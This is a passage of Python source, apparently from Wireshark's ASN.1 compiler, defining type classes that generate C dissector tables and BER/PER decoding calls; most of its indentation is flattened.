cls = 'BER_CLASS_ANY/*choice*/'
#if hasattr(self, 'ext_list'):
# lst.extend(self.ext_list)
#if (len(lst) > 0):
# cls = lst[0].GetTag(ectx)[0]
#for e in (lst):
# if (e.GetTag(ectx)[0] != cls):
# cls = '-1/*choice*/'
return (cls, '-1/*choice*/')
def GetTTagSel(self, sel, ectx):
ee = self.sel_item('', sel, ectx)
if ee:
return ee.GetTag(ectx)
else:
return ('BER_CLASS_ANY/*unknown selection*/', '-1/*unknown selection*/')
def IndetermTag(self, ectx):
#print "Choice IndetermTag()=%s" % (str(not self.HasOwnTag()))
return not self.HasOwnTag()
def detect_tagval(self, ectx):
tagval = False
lst = self.elt_list[:]
if hasattr(self, 'ext_list'):
lst.extend(self.ext_list)
if (len(lst) > 0) and (not ectx.Per() or lst[0].HasOwnTag()):
t = lst[0].GetTag(ectx)[0]
tagval = True
else:
t = ''
tagval = False
if (t == 'BER_CLASS_UNI'):
tagval = False
for e in (lst):
if not ectx.Per() or e.HasOwnTag():
tt = e.GetTag(ectx)[0]
else:
tt = ''
tagval = False
if (tt != t):
tagval = False
return tagval
def get_vals(self, ectx):
tagval = self.detect_tagval(ectx)
vals = []
cnt = 0
for e in (self.elt_list):
if (tagval): val = e.GetTag(ectx)[1]
else: val = str(cnt)
vals.append((val, e.name))
cnt += 1
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
if (tagval): val = e.GetTag(ectx)[1]
else: val = str(cnt)
vals.append((val, e.name))
cnt += 1
return vals
def eth_type_vals(self, tname, ectx):
out = '\n'
vals = self.get_vals(ectx)
out += ectx.eth_vals(tname, vals)
return out
def reg_enum_vals(self, tname, ectx):
vals = self.get_vals(ectx)
for (val, id) in vals:
ectx.eth_reg_value(id, self, val, ethname=ectx.eth_enum_item(tname, id))
def eth_type_enum(self, tname, ectx):
out = '\n'
vals = self.get_vals(ectx)
out += ectx.eth_enum(tname, vals)
return out
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_choice'
return pars
def eth_type_default_table(self, ectx, tname):
def out_item(val, e, ext, ectx):
has_enum = ectx.eth_type[tname]['enum'] & EF_ENUM
if (has_enum):
vval = ectx.eth_enum_item(tname, e.name)
else:
vval = val
f = fname + '/' + e.name
ef = ectx.field[f]['ethname']
t = ectx.eth_hf[ef]['ethtype']
if (ectx.Ber()):
opt = ''
if (not e.HasOwnTag()):
opt = 'BER_FLAGS_NOOWNTAG'
elif (e.HasImplicitTag(ectx)):
if (opt): opt += '|'
opt += 'BER_FLAGS_IMPLTAG'
if (not opt): opt = '0'
if (ectx.Ber()):
(tc, tn) = e.GetTag(ectx)
out = ' { %3s, %-24s, %-13s, %s, %s, dissect_%s_%s },\n' \
% (vval, '&'+ectx.eth_hf[ef]['fullname'], tc, tn, opt, ectx.eth_type[t]['proto'], t)
elif (ectx.Per()):
out = ' { %3s, %-24s, %-23s, dissect_%s_%s },\n' \
% (vval, '&'+ectx.eth_hf[ef]['fullname'], ext, ectx.eth_type[t]['proto'], t)
else:
out = ''
return out
# end out_item()
#print "eth_type_default_table(tname='%s')" % (tname)
fname = ectx.eth_type[tname]['ref'][0]
tagval = self.detect_tagval(ectx)
table = "static const %(ER)s_choice_t %(TABLE)s[] = {\n"
cnt = 0
if hasattr(self, 'ext_list'):
ext = 'ASN1_EXTENSION_ROOT'
else:
ext = 'ASN1_NO_EXTENSIONS'
empty_ext_flag = '0'
if (len(self.elt_list)==0) and hasattr(self, 'ext_list') and (len(self.ext_list)==0):
empty_ext_flag = ext
for e in (self.elt_list):
if (tagval): val = e.GetTag(ectx)[1]
else: val = str(cnt)
table += out_item(val, e, ext, ectx)
cnt += 1
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
if (tagval): val = e.GetTag(ectx)[1]
else: val = str(cnt)
table += out_item(val, e, 'ASN1_NOT_EXTENSION_ROOT', ectx)
cnt += 1
if (ectx.Ber()):
table += " { 0, NULL, 0, 0, 0, NULL }\n};\n"
else:
table += " { 0, NULL, %s, NULL }\n};\n" % (empty_ext_flag)
return table
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_choice', ret='offset',
par=(('%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_choice', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),
('%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ChoiceValue ----------------------------------------------------
class ChoiceValue (Value):
def to_str(self, ectx):
return self.val.to_str(ectx)
def fld_obj_eq(self, other):
return isinstance(other, ChoiceValue) and (self.choice == other.choice) and (str(self.val.val) == str(other.val.val))
#--- EnumeratedType -----------------------------------------------------------
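# ENUMERATED: get_vals_etc() assigns numbers to items that lack an explicit
# NamedNumber and builds an optional PER value-map table for enumerations
# whose values are not simply 0..n-1.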
class EnumeratedType (Type):
def to_python (self, ctx):
def strify_one (named_num):
return "%s=%s" % (named_num.ident, named_num.val)
return "asn1.ENUM(%s)" % ",".join (map (strify_one, self.val))
def eth_ftype(self, ectx):
return ('FT_UINT32', 'BASE_DEC')
def eth_strings(self):
return '$$'
def eth_has_vals(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_ENUMERATED')
def get_vals_etc(self, ectx):
vals = []
lastv = 0
used = {}
maxv = 0
root_num = 0
ext_num = 0
map_table = []
for e in (self.val):
if e.type == 'NamedNumber':
used[int(e.val)] = True
for e in (self.val):
if e.type == 'NamedNumber':
val = int(e.val)
else:
while lastv in used:
lastv += 1
val = lastv
used[val] = True
vals.append((val, e.ident))
map_table.append(val)
root_num += 1
if val > maxv:
maxv = val
if self.ext is not None:
for e in (self.ext):
if e.type == 'NamedNumber':
used[int(e.val)] = True
for e in (self.ext):
if e.type == 'NamedNumber':
val = int(e.val)
else:
while lastv in used:
lastv += 1
val = lastv
used[val] = True
vals.append((val, e.ident))
map_table.append(val)
ext_num += 1
if val > maxv:
maxv = val
need_map = False
for i in range(len(map_table)):
need_map = need_map or (map_table[i] != i)
if (not need_map):
map_table = None
return (vals, root_num, ext_num, map_table)
def eth_type_vals(self, tname, ectx):
out = '\n'
vals = self.get_vals_etc(ectx)[0]
out += ectx.eth_vals(tname, vals)
return out
def reg_enum_vals(self, tname, ectx):
vals = self.get_vals_etc(ectx)[0]
for (val, id) in vals:
ectx.eth_reg_value(id, self, val, ethname=ectx.eth_enum_item(tname, id))
def eth_type_enum(self, tname, ectx):
out = '\n'
vals = self.get_vals_etc(ectx)[0]
out += ectx.eth_enum(tname, vals)
return out
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(root_num, ext_num, map_table) = self.get_vals_etc(ectx)[1:]
        if (self.ext is not None):
            ext = 'TRUE'
        else:
            ext = 'FALSE'
pars['ROOT_NUM'] = str(root_num)
pars['EXT'] = ext
pars['EXT_NUM'] = str(ext_num)
if (map_table):
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_value_map'
else:
pars['TABLE'] = 'NULL'
return pars
def eth_type_default_table(self, ectx, tname):
if (not ectx.Per()): return ''
map_table = self.get_vals_etc(ectx)[3]
        if (map_table is None): return ''
table = "static guint32 %(TABLE)s[%(ROOT_NUM)s+%(EXT_NUM)s] = {"
table += ", ".join([str(v) for v in map_table])
table += "};\n"
return table
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasValueConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_integer', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_integer', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_enumerated', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ROOT_NUM)s', '%(VAL_PTR)s', '%(EXT)s', '%(EXT_NUM)s', '%(TABLE)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- EmbeddedPDVType -----------------------------------------------------------
class EmbeddedPDVType (Type):
def eth_tname(self):
return 'EMBEDDED_PDV'
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_EMBEDDED_PDV')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if ectx.default_embedded_pdv_cb:
pars['TYPE_REF_FN'] = ectx.default_embedded_pdv_cb
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_EmbeddedPDV_Type', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_embedded_pdv', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ExternalType -----------------------------------------------------------
class ExternalType (Type):
def eth_tname(self):
return 'EXTERNAL'
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_EXTERNAL')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if ectx.default_external_type_cb:
pars['TYPE_REF_FN'] = ectx.default_external_type_cb
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_external_type', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_external_type', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- OpenType -----------------------------------------------------------
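# Open type (information object class field): if it is constrained to a
# single known type, dissection is delegated to that type's dissector,
# otherwise a NULL callback is emitted.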
class OpenType (Type):
def to_python (self, ctx):
return "asn1.ANY"
def single_type(self):
if (self.HasConstraint() and
self.constr.type == 'Type' and
self.constr.subtype.type == 'Type_Ref'):
return self.constr.subtype.val
return None
def eth_reg_sub(self, ident, ectx):
t = self.single_type()
if t:
ectx.eth_dep_add(ident, t)
def eth_tname(self):
t = self.single_type()
if t:
return 'OpenType_' + t
else:
return Type.eth_tname(self)
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_ANY', '0')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['FN_VARIANT'] = ectx.default_opentype_variant
t = self.single_type()
if t:
t = ectx.type[t]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_open_type%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- InstanceOfType -----------------------------------------------------------
class InstanceOfType (Type):
def eth_tname(self):
return 'INSTANCE_OF'
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_EXTERNAL')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if ectx.default_external_type_cb:
pars['TYPE_REF_FN'] = ectx.default_external_type_cb
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_external_type', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
elif (ectx.Per()):
body = '#error Can not decode %s' % (tname)
else:
body = '#error Can not decode %s' % (tname)
return body
#--- AnyType -----------------------------------------------------------
class AnyType (Type):
def to_python (self, ctx):
return "asn1.ANY"
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_ANY', '0')
def eth_type_default_body(self, ectx, tname):
body = '#error Can not decode %s' % (tname)
return body
class Literal (Node):
def to_python (self, ctx):
return self.val
#--- NullType -----------------------------------------------------------------
class NullType (Type):
def to_python (self, ctx):
return 'asn1.NULL'
def eth_tname(self):
return 'NULL'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_NULL')
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_null', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_null', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- NullValue ----------------------------------------------------
class NullValue (Value):
def to_str(self, ectx):
return 'NULL'
#--- RealType -----------------------------------------------------------------
class RealType (Type):
def to_python (self, ctx):
return 'asn1.REAL'
def eth_tname(self):
return 'REAL'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_REAL')
def eth_ftype(self, ectx):
return ('FT_DOUBLE', 'BASE_NONE')
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_real', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_real', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- BooleanType --------------------------------------------------------------
class BooleanType (Type):
def to_python (self, ctx):
return 'asn1.BOOLEAN'
def eth_tname(self):
return 'BOOLEAN'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_BOOLEAN')
def eth_ftype(self, ectx):
return ('FT_BOOLEAN', 'BASE_NONE')
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_boolean', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s', '%(VAL_PTR)s'),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_boolean', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- OctetStringType ----------------------------------------------------------
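# OCTET STRING: supports size constraints and CONTAINING contents
# constraints; the latter can delegate either to another type's dissector or
# to a registered PDU, depending on ectx.default_containing_variant.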
class OctetStringType (Type):
def to_python (self, ctx):
return 'asn1.OCTSTRING'
def eth_tname(self):
if not self.HasConstraint():
return 'OCTET_STRING'
elif self.constr.type == 'Size':
return 'OCTET_STRING' + '_' + self.constr.eth_constrname()
else:
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_BYTES', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_OCTETSTRING')
def eth_need_pdu(self, ectx):
pdu = None
if self.HasContentsConstraint():
t = self.constr.GetContents(ectx)
if t and (ectx.default_containing_variant in ('_pdu', '_pdu_new')):
pdu = { 'type' : t,
'new' : ectx.default_containing_variant == '_pdu_new' }
return pdu
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
if self.HasContentsConstraint():
pars['FN_VARIANT'] = ectx.default_containing_variant
t = self.constr.GetContents(ectx)
if t:
if pars['FN_VARIANT'] in ('_pdu', '_pdu_new'):
t = ectx.field[t]['ethname']
pars['TYPE_REF_PROTO'] = ''
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_TNAME)s'
else:
t = ectx.type[t]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_octet_string', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_octet_string', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
if self.HasContentsConstraint():
body = ectx.eth_fn_call('dissect_%(ER)s_octet_string_containing%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(TYPE_REF_FN)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_octet_string', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- CharacterStringType ------------------------------------------------------
class CharacterStringType (Type):
def eth_tname(self):
if not self.HasConstraint():
return self.eth_tsname()
elif self.constr.type == 'Size':
return self.eth_tsname() + '_' + self.constr.eth_constrname()
else:
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_STRING', 'BASE_NONE')
class RestrictedCharacterStringType (CharacterStringType):
def to_python (self, ctx):
return 'asn1.' + self.eth_tsname()
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_' + self.eth_tsname())
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
(pars['STRING_TYPE'], pars['STRING_TAG']) = (self.eth_tsname(), self.GetTTag(ectx)[1])
(pars['ALPHABET'], pars['ALPHABET_LEN']) = self.eth_get_alphabet_constr(ectx)
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_restricted_string', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(STRING_TAG)s'),
('%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_restricted_string', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(STRING_TAG)s'),
('%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per() and self.HasPermAlph()):
body = ectx.eth_fn_call('dissect_%(ER)s_restricted_character_string', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(ALPHABET)s', '%(ALPHABET_LEN)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
if (self.eth_tsname() == 'GeneralString'):
body = ectx.eth_fn_call('dissect_%(ER)s_%(STRING_TYPE)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
            elif (self.eth_tsname() in ('GeneralizedTime', 'UTCTime')):
                # both time types are dissected as VisibleString in PER
                body = ectx.eth_fn_call('dissect_%(ER)s_VisibleString', ret='offset',
                                        par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
                                             ('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_%(STRING_TYPE)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
class BMPStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'BMPString'
class GeneralStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'GeneralString'
class GraphicStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'GraphicString'
class IA5StringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'IA5String'
class NumericStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'NumericString'
class PrintableStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'PrintableString'
class TeletexStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'TeletexString'
class T61StringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'T61String'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_TeletexString')
class UniversalStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'UniversalString'
class UTF8StringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'UTF8String'
class VideotexStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'VideotexString'
class VisibleStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'VisibleString'
class ISO646StringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'ISO646String'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_VisibleString')
class UnrestrictedCharacterStringType (CharacterStringType):
def to_python (self, ctx):
return 'asn1.UnrestrictedCharacterString'
def eth_tsname(self):
return 'CHARACTER_STRING'
#--- UsefulType ---------------------------------------------------------------
class GeneralizedTime (RestrictedCharacterStringType):
def eth_tsname(self):
return 'GeneralizedTime'
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_%(STRING_TYPE)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),))
return body
else:
return RestrictedCharacterStringType.eth_type_default_body(self, ectx, tname)
class UTCTime (RestrictedCharacterStringType):
def eth_tsname(self):
return 'UTCTime'
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_%(STRING_TYPE)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),))
return body
else:
return RestrictedCharacterStringType.eth_type_default_body(self, ectx, tname)
class ObjectDescriptor (RestrictedCharacterStringType):
def eth_tsname(self):
return 'ObjectDescriptor'
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = RestrictedCharacterStringType.eth_type_default_body(self, ectx, tname)
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_object_descriptor', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ObjectIdentifierType -----------------------------------------------------
class ObjectIdentifierType (Type):
def to_python (self, ctx):
return 'asn1.OBJECT_IDENTIFIER'
def eth_tname(self):
return 'OBJECT_IDENTIFIER'
def eth_ftype(self, ectx):
return ('FT_OID', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_OID')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['FN_VARIANT'] = ectx.default_oid_variant
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_object_identifier%(FN_VARIANT)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_object_identifier%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ObjectIdentifierValue ----------------------------------------------------
class ObjectIdentifierValue (Value):
def get_num(self, path, val):
return str(oid_names.get(path + '/' + val, val))
def to_str(self, ectx):
out = ''
path = ''
first = True
sep = ''
for v in self.comp_list:
if isinstance(v, Node) and (v.type == 'name_and_number'):
vstr = v.number
elif v.isdigit():
vstr = v
else:
vstr = self.get_num(path, v)
if not first and not vstr.isdigit():
vstr = ectx.value_get_val(vstr)
if first:
if vstr.isdigit():
out += '"' + vstr
else:
out += ectx.value_get_eth(vstr) + '"'
else:
out += sep + vstr
path += sep + vstr
first = False
sep = '.'
out += '"'
return out
def get_dep(self):
v = self.comp_list[0]
if isinstance(v, Node) and (v.type == 'name_and_number'):
return None
elif v.isdigit():
return None
else:
vstr = self.get_num('', v)
if vstr.isdigit():
return None
else:
return vstr
class NamedNumber(Node):
def to_python (self, ctx):
return "('%s',%s)" % (self.ident, self.val)
class NamedNumListBase(Node):
def to_python (self, ctx):
return "asn1.%s_class ([%s])" % (self.asn1_typ,",".join (
[x.to_python (ctx) for x in self.named_list]))
#--- RelativeOIDType ----------------------------------------------------------
class RelativeOIDType (Type):
def eth_tname(self):
return 'RELATIVE_OID'
def eth_ftype(self, ectx):
return ('FT_REL_OID', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_RELATIVE_OID')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['FN_VARIANT'] = ectx.default_oid_variant
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_relative_oid%(FN_VARIANT)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_relative_oid%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- IntegerType --------------------------------------------------------------
class IntegerType (Type):
def to_python (self, ctx):
return "asn1.INTEGER_class ([%s])" % (",".join (
[x.to_python (ctx) for x in self.named_list]))
def add_named_value(self, ident, val):
e = NamedNumber(ident = ident, val = val)
if not self.named_list:
self.named_list = []
self.named_list.append(e)
def eth_tname(self):
if self.named_list:
return Type.eth_tname(self)
if not self.HasConstraint():
return 'INTEGER'
